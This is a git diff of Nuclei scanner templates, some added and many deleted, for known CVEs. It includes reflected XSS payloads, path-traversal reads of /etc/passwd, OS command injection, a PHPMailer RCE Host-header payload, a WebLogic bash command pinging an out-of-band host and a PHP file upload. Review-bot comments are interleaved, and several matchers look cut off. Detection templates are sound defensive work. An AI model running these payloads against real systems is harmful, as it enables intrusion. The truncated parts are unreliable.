index 0000000000..37b57b29af
--- /dev/null
+++ b/nuclei-templates/CVE-2016/cve-2016-1000143.yaml
@@ -0,0 +1,38 @@
+id: CVE-2016-1000143
+
+info:
+ name: Photoxhibit v2.1.8 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: Reflected XSS in wordpress plugin photoxhibit v2.1.8
+ reference:
+ - http://www.vapidlabs.com/wp/wp_advisory.php?v=780
+ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000143
+ - https://wordpress.org/plugins/photoxhibit
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2016-1000143
+ cwe-id: CWE-79
+ tags: cve,cve2016,wordpress,wp-plugin,xss
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ''
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2016/cve-2016-1000149.yaml b/nuclei-templates/CVE-2016/cve-2016-1000149.yaml
new file mode 100644
index 0000000000..f55daff95d
--- /dev/null
+++ b/nuclei-templates/CVE-2016/cve-2016-1000149.yaml
@@ -0,0 +1,39 @@
+id: CVE-2016-1000149
+
+info:
+ name: Simpel Reserveren 3 <= 3.5.2 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: Reflected XSS in wordpress plugin simpel-reserveren v3.5.2
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000149
+ - https://wordpress.org/plugins/simpel-reserveren
+ - http://www.vapidlabs.com/wp/wp_advisory.php?v=474
+ - http://www.securityfocus.com/bid/93582
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2016-1000149
+ cwe-id: CWE-79
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2016/cve-2016-1000152.yaml b/nuclei-templates/CVE-2016/cve-2016-1000152.yaml
new file mode 100644
index 0000000000..897d14916e
--- /dev/null
+++ b/nuclei-templates/CVE-2016/cve-2016-1000152.yaml
@@ -0,0 +1,39 @@
+id: CVE-2016-1000152
+
+info:
+ name: Tidio-form <= 1.0 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: Reflected XSS in wordpress plugin tidio-form v1.0
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000152
+ - http://www.vapidlabs.com/wp/wp_advisory.php?v=799
+ - https://wordpress.org/plugins/tidio-form
+ - http://www.securityfocus.com/bid/93579
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2016-1000152
+ cwe-id: CWE-79
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2016/cve-2016-1000154.yaml b/nuclei-templates/CVE-2016/cve-2016-1000154.yaml
new file mode 100644
index 0000000000..6080409f32
--- /dev/null
+++ b/nuclei-templates/CVE-2016/cve-2016-1000154.yaml
@@ -0,0 +1,39 @@
+id: CVE-2016-1000154
+
+info:
+ name: WHIZZ <= 1.0.7 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: Reflected XSS in wordpress plugin whizz v1.0.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000154
+ - http://www.vapidlabs.com/wp/wp_advisory.php?v=112
+ - https://wordpress.org/plugins/whizz
+ - http://www.securityfocus.com/bid/93538
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2016-1000154
+ cwe-id: CWE-79
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2016/cve-2016-10033.yaml b/nuclei-templates/CVE-2016/cve-2016-10033.yaml
new file mode 100644
index 0000000000..17b510dc45
--- /dev/null
+++ b/nuclei-templates/CVE-2016/cve-2016-10033.yaml
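Review bot: The affected version is stated two different ways in `info`: the name says `WHIZZ <= 1.0.7` while the description says `whizz v1.0.`, which reads like a cut-off version string. Anyone triaging a hit from the description alone would check for the wrong release. If 1.0.7 is the right bound, the description should read `description: Reflected XSS in wordpress plugin whizz <= 1.0.7`.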
@@ -0,0 +1,56 @@ +id: CVE-2016-10033 + +info: + name: WordPress PHPMailer < 5.2.18 Remote Code Execution + author: princechaddha + severity: critical + description: WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a " (backslash double quote) in a crafted Sender property in isMail transport. + reference: + - https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html + - https://nvd.nist.gov/vuln/detail/CVE-2016-10033 + - https://www.exploit-db.com/exploits/40970/ + - https://www.exploit-db.com/exploits/40968/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2016-10033 + cwe-id: CWE-77 + tags: wordpress,cve,cve2016,rce + +requests: + - raw: + - |+ + GET /?author=1 HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + + - |+ + POST /wp-login.php?action=lostpassword HTTP/1.1 + Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null) + Accept: */* + Content-Type: application/x-www-form-urlencoded + + wp-submit=Get+New+Password&redirect_to=&user_login={{username}} + + unsafe: true + extractors: + - type: regex + name: username + internal: true + group: 1 + part: body + regex: + - 'Author:(?:[A-Za-z0-9 -\_="]+)?" + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html diff --git a/nuclei-templates/CVE-2017/CVE-2017-1000028.yaml b/nuclei-templates/CVE-2017/CVE-2017-1000028.yaml deleted file mode 100644 index 2402b889a0..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-1000028.yaml +++ /dev/null 
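Review bot: The second request in this template changes state on the scanned site: it submits the lost-password form for the extracted user and carries a command in the `Host` header. The `tags` line has no `intrusive` marker, though the CVE-2017-6090 template elsewhere in this patch uses one for a comparable case. A scan profile that excludes intrusive templates will therefore still run this one against production hosts. I would change the line to `tags: wordpress,cve,cve2016,rce,intrusive`. The matchers visible here check only status 200 and `text/html` (one body matcher looks cut off in this rendering), so a hit does not appear to confirm that anything ran and should be documented as unverified.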
@@ -1,44 +0,0 @@ -id: CVE-2017-1000028 - -info: - name: Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion - author: pikpikcu,daffainfo - severity: high - description: Oracle GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated local file inclusion vulnerabilities that can be exploited by issuing specially crafted HTTP GET requests. - reference: - - https://www.exploit-db.com/exploits/45196 - - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18822 - - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904 - - https://www.exploit-db.com/exploits/45196/ - - https://nvd.nist.gov/vuln/detail/CVE-2017-1000028 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2017-1000028 - cwe-id: CWE-22 - tags: cve,cve2017,oracle,glassfish,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" - - "{{BaseURL}}/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini" - - stop-at-first-match: true - matchers-condition: or - matchers: - - type: dsl - dsl: - - "regex('root:.*:0:0:', body)" - - "status_code == 200" - condition: and - - - type: dsl - dsl: - - "contains(body, 'bit app support')" - - "contains(body, 'fonts')" - - "contains(body, 'extensions')" - - "status_code == 200" - condition: and - -# Enhanced by mp on 2022/06/09 diff --git a/nuclei-templates/CVE-2017/CVE-2017-10271.yaml b/nuclei-templates/CVE-2017/CVE-2017-10271.yaml deleted file mode 100644 index 9585ea0af0..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-10271.yaml +++ /dev/null 
@@ -1,99 +0,0 @@ -id: CVE-2017-10271 - -info: - name: Oracle WebLogic Server - Remote Command Execution - author: dr_set,ImNightmaree,true13 - severity: high - description: | - The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security) is susceptible to remote command execution. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server. - reference: - - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271 - - https://github.com/SuperHacker-liuan/cve-2017-10271-poc - - http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html - - https://nvd.nist.gov/vuln/detail/CVE-2017-10271 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H - cvss-score: 7.5 - cve-id: CVE-2017-10271 - tags: weblogic,oast,kev,vulhub,cve,cve2017,rce,oracle - -requests: - - raw: - - | - POST /wls-wsat/CoordinatorPortType HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Accept-Language: en - Content-Type: text/xml - - - - - - - - - - /bin/bash - - - -c - - - ping -c 1 {{interactsh-url}} - - - - - - - - - - - | - POST /wls-wsat/CoordinatorPortType HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Accept-Language: en - Content-Type: text/xml - - - - - - - - - - - - - {{randstr}} - - - - - - - - - - stop-at-first-match: true - matchers-condition: or - matchers: - - type: dsl - dsl: - - regex("java.lang.ProcessBuilder || 0", body) - - contains(interactsh_protocol, "dns") - - status_code == 500 - condition: and - - - type: dsl - dsl: - - body == "{{randstr}}" - - status_code == 200 - condition: and - -# Enhanced by mp on 2022/06/09 
diff --git a/nuclei-templates/CVE-2017/cve-2017-10974.yaml b/nuclei-templates/CVE-2017/CVE-2017-10974.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-10974.yaml rename to nuclei-templates/CVE-2017/CVE-2017-10974.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-11610.yaml b/nuclei-templates/CVE-2017/CVE-2017-11610.yaml deleted file mode 100644 index ac5a9f54d6..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-11610.yaml +++ /dev/null 
@@ -1,58 +0,0 @@ -id: CVE-2017-11610 - -info: - name: XML-RPC Server - Remote Code Execution - author: notnotnotveg - severity: high - description: The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisor namespace lookups. - reference: - - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md - - https://nvd.nist.gov/vuln/detail/CVE-2017-11610 - - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXGWOJNSWWK2TTWQJZJUP66FLFIWDMBQ/ - - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DTPDZV4ZRICDYAYZVUHSYZAYDLRMG2IM/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2017-11610 - cwe-id: CWE-276 - metadata: - shodan-query: http.title:"Supervisor Status" - tags: oast,xmlrpc,msf,cve,cve2017,rce,supervisor - -requests: - - raw: - - | - POST /RPC2 HTTP/1.1 - Host: {{Hostname}} - Accept: text/xml - Content-type: text/xml - - - supervisor.supervisord.options.warnings.linecache.os.system - - - nslookup {{interactsh-url}} - - - - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "dns" - - - type: word - part: header - words: - - "text/xml" - - - type: word - part: body - words: - - "" - - "" - condition: and - -# Enhanced by mp on 2022/06/09 diff --git a/nuclei-templates/CVE-2017/cve-2017-12149.yaml b/nuclei-templates/CVE-2017/CVE-2017-12149.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-12149.yaml rename to nuclei-templates/CVE-2017/CVE-2017-12149.yaml 
diff --git a/nuclei-templates/CVE-2017/cve-2017-12544.yaml b/nuclei-templates/CVE-2017/CVE-2017-12544.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-12544.yaml rename to nuclei-templates/CVE-2017/CVE-2017-12544.yaml diff --git a/nuclei-templates/CVE-2017/cve-2017-12611.yaml b/nuclei-templates/CVE-2017/CVE-2017-12611.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-12611.yaml rename to nuclei-templates/CVE-2017/CVE-2017-12611.yaml diff --git a/nuclei-templates/CVE-2017/cve-2017-12615.yaml b/nuclei-templates/CVE-2017/CVE-2017-12615.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-12615.yaml rename to nuclei-templates/CVE-2017/CVE-2017-12615.yaml diff --git a/nuclei-templates/CVE-2017/cve-2017-12629.yaml b/nuclei-templates/CVE-2017/CVE-2017-12629.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-12629.yaml rename to nuclei-templates/CVE-2017/CVE-2017-12629.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-12794.yaml b/nuclei-templates/CVE-2017/CVE-2017-12794.yaml deleted file mode 100644 index 4e18ff6124..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-12794.yaml +++ /dev/null 
@@ -1,42 +0,0 @@ -id: CVE-2017-12794 - -info: - name: Django Debug Page - Cross-Site Scripting - author: pikpikcu - severity: medium - description: | - Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5 has HTML autoescaping disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allows a cross-site scripting attack. This vulnerability shouldn't affect most production sites since run with "DEBUG = True" is not on by default (which is what makes the page visible). - reference: - - https://twitter.com/sec715/status/1406779605055270914 - - https://nvd.nist.gov/vuln/detail/CVE-2017-12794 - - https://www.djangoproject.com/weblog/2017/sep/05/security-releases/ - - http://web.archive.org/web/20211207172022/https://securitytracker.com/id/1039264 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2017-12794 - cwe-id: CWE-79 - tags: xss,django,cve,cve2017 - -requests: - - method: GET - path: - - "{{BaseURL}}/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: status - status: - - 200 - - - type: word - words: - - "text/html" - part: header - -# Enhanced by mp on 2022/04/26 diff --git a/nuclei-templates/CVE-2017/CVE-2017-14535.yaml b/nuclei-templates/CVE-2017/CVE-2017-14535.yaml deleted file mode 100644 index 330df119bb..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-14535.yaml +++ /dev/null 
@@ -1,42 +0,0 @@ -id: CVE-2017-14535 - -info: - name: Trixbox - 2.8.0.4 OS Command Injection - author: pikpikcu - severity: high - description: Trixbox 2.8.0.4 is vulnerable to OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php. - reference: - - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/ - - https://www.exploit-db.com/exploits/49913 - - https://nvd.nist.gov/vuln/detail/CVE-2017-14535 - - https://www.linkedin.com/pulse/trixbox-os-command-injection-vulnerability-sachin-wagh-ceh-ecsa-/?published=t - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2017-14535 - cwe-id: CWE-78 - tags: cve,cve2017,trixbox,rce,injection,edb - -requests: - - raw: - - | - GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: de,en-US;q=0.7,en;q=0.3 - Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= - Connection: close - Cache-Control: max-age=0 - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/01 diff --git a/nuclei-templates/CVE-2017/cve-2017-14651.yaml b/nuclei-templates/CVE-2017/CVE-2017-14651.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-14651.yaml rename to nuclei-templates/CVE-2017/CVE-2017-14651.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-15287.yaml b/nuclei-templates/CVE-2017/CVE-2017-15287.yaml deleted file mode 100644 index 916b9a90a9..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-15287.yaml +++ /dev/null 
@@ -1,32 +0,0 @@ -id: CVE-2017-15287 - -info: - name: Dreambox WebControl 2.0.0 - Cross-Site Scripting - author: pikpikcu - severity: medium - description: | - Dream Multimedia Dreambox devices via their WebControl component are vulnerable to reflected cross-site scripting, as demonstrated by the "Name des Bouquets" field, or the file parameter to the /file URI. - reference: - - https://fireshellsecurity.team/assets/pdf/Vulnerability-XSS-Dreambox.pdf - - https://www.exploit-db.com/exploits/42986/ - - https://nvd.nist.gov/vuln/detail/CVE-2017-15287 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2017-15287 - cwe-id: CWE-79 - tags: dreambox,edb,cve,cve2017,xss - -requests: - - raw: - - | - GET /webadmin/pkg?command= HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - matchers: - - type: word - words: - - 'Unknown command: ' - -# Enhanced by mp on 2022/04/26 diff --git a/nuclei-templates/CVE-2017/cve-2017-15363.yaml b/nuclei-templates/CVE-2017/CVE-2017-15363.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-15363.yaml rename to nuclei-templates/CVE-2017/CVE-2017-15363.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-15647.yaml b/nuclei-templates/CVE-2017/CVE-2017-15647.yaml deleted file mode 100644 index d0a33eaa1a..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-15647.yaml +++ /dev/null 
@@ -1,36 +0,0 @@ -id: CVE-2017-15647 - -info: - name: FiberHome Routers - Local File Inclusion - author: daffainfo - severity: high - description: FiberHome routers are susceptible to local file inclusion in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value. - reference: - - https://www.exploit-db.com/exploits/44054 - - https://www.cvedetails.com/cve/CVE-2017-15647 - - https://blogs.securiteam.com/index.php/archives/3472 - - https://nvd.nist.gov/vuln/detail/CVE-2017-15647 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2017-15647 - cwe-id: CWE-22 - tags: cve,cve2017,lfi,router - -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/09 diff --git a/nuclei-templates/CVE-2017/cve-2017-16806.yaml b/nuclei-templates/CVE-2017/CVE-2017-16806.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-16806.yaml rename to nuclei-templates/CVE-2017/CVE-2017-16806.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-17451.yaml b/nuclei-templates/CVE-2017/CVE-2017-17451.yaml deleted file mode 100644 index 2cd0371034..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-17451.yaml +++ /dev/null 
@@ -1,35 +0,0 @@ -id: CVE-2017-17451 - -info: - name: WP Mailster <= 1.5.4 - Unauthenticated Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php. - reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17451 - tags: cve,cve2017,wordpress,xss,wp-plugin - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2017-17451 - cwe-id: CWE-79 - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2017/cve-2017-3528.yaml b/nuclei-templates/CVE-2017/CVE-2017-3528.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-3528.yaml rename to nuclei-templates/CVE-2017/CVE-2017-3528.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-4011.yaml b/nuclei-templates/CVE-2017/CVE-2017-4011.yaml deleted file mode 100644 index 2d27151229..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-4011.yaml +++ /dev/null 
@@ -1,38 +0,0 @@ -id: CVE-2017-4011 - -info: - name: McAfee Network Data Loss Prevention 9.3.x - Cross-Site Scripting - author: geeknik - severity: medium - description: McAfee Network Data Loss Prevention User-Agent 9.3.x contains a cross-site scripting vulnerability which allows remote attackers to get session/cookie information via modification of the HTTP request. - reference: - - https://medium.com/@david.valles/cve-2017-4011-reflected-xss-found-in-mcafee-network-data-loss-prevention-ndlp-9-3-x-cf20451870ab - - https://kc.mcafee.com/corporate/index?page=content&id=SB10198 - - https://nvd.nist.gov/vuln/detail/CVE-2017-4011 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2017-4011 - cwe-id: CWE-79 - tags: cve,cve2017,mcafee,xss - -requests: - - method: GET - path: - - "{{BaseURL}}" - headers: - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);// - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "var ua='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//" - - - type: word - part: header - words: - - "text/html" - -# Enhanced by mp on 2022/08/12 diff --git a/nuclei-templates/CVE-2017/cve-2017-5638.yaml b/nuclei-templates/CVE-2017/CVE-2017-5638.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-5638.yaml rename to nuclei-templates/CVE-2017/CVE-2017-5638.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-6090.yaml b/nuclei-templates/CVE-2017/CVE-2017-6090.yaml deleted file mode 100644 index 2dc16ebb62..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-6090.yaml +++ /dev/null 
@@ -1,51 +0,0 @@ -id: CVE-2017-6090 - -info: - name: PhpColl 2.5.1 Arbitrary File Upload - author: pikpikcu - severity: high - description: PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/ via clients/editclient.php. - reference: - - https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/ - - https://nvd.nist.gov/vuln/detail/CVE-2017-6090 - - https://www.exploit-db.com/exploits/42934/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2017-6090 - cwe-id: CWE-434 - metadata: - shodan-query: http.title:"PhpCollab" - tags: cve2017,phpcollab,rce,fileupload,edb,cve,intrusive - -requests: - - raw: - - | # REQUEST 1 - POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137 - - -----------------------------154934846911423734231554128137 - Content-Disposition: form-data; name="upload"; filename="{{randstr}}.php" - Content-Type: application/x-php - - - - -----------------------------154934846911423734231554128137-- - - - | # REQUEST 2 - GET /logos_clients/1.php HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "48dbd2384cb6b996fa1e2855c7f0567f" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/06 diff --git a/nuclei-templates/CVE-2017/CVE-2017-7615.yaml b/nuclei-templates/CVE-2017/CVE-2017-7615.yaml deleted file mode 100644 index 33787cf3bd..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-7615.yaml +++ /dev/null 
@@ -1,43 +0,0 @@ -id: CVE-2017-7615 - -info: - name: CVE-2017-7615 - author: bp0lr,dwisiswant0 - severity: high - description: MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php. - tags: cve,cve2017,mantisbt - - # THIS TEMPLATE IS ONLY FOR DETECTING - # To carry out further attacks, please see reference[2] below. - # This template works by guessing user ID. - # MantisBT before 1.3.10, 2.2.4, and 2.3.1, that can be downloaded on reference[1]. - reference: - - https://sourceforge.net/projects/mantisbt/files/mantis-stable/ - - http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt - - https://www.exploit-db.com/exploits/41890 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.80 - cve-id: CVE-2017-7615 - cwe-id: CWE-640 - -requests: - - method: GET - path: - - "{{BaseURL}}/verify.php?id=1&confirm_hash=" - - "{{BaseURL}}/mantis/verify.php?id=1&confirm_hash=" - - "{{BaseURL}}/mantisBT/verify.php?id=1&confirm_hash=" - - "{{BaseURL}}/mantisbt-2.3.0/verify.php?id=1&confirm_hash=" - - "{{BaseURL}}/bugs/verify.php?confirm_hash=&id=1" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - " - - - | - GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/html - - - - - | - GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/html - - - - - | - GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/html - - - - - | - GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/html - - - - - | - GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/html - - - - matchers-condition: and - 
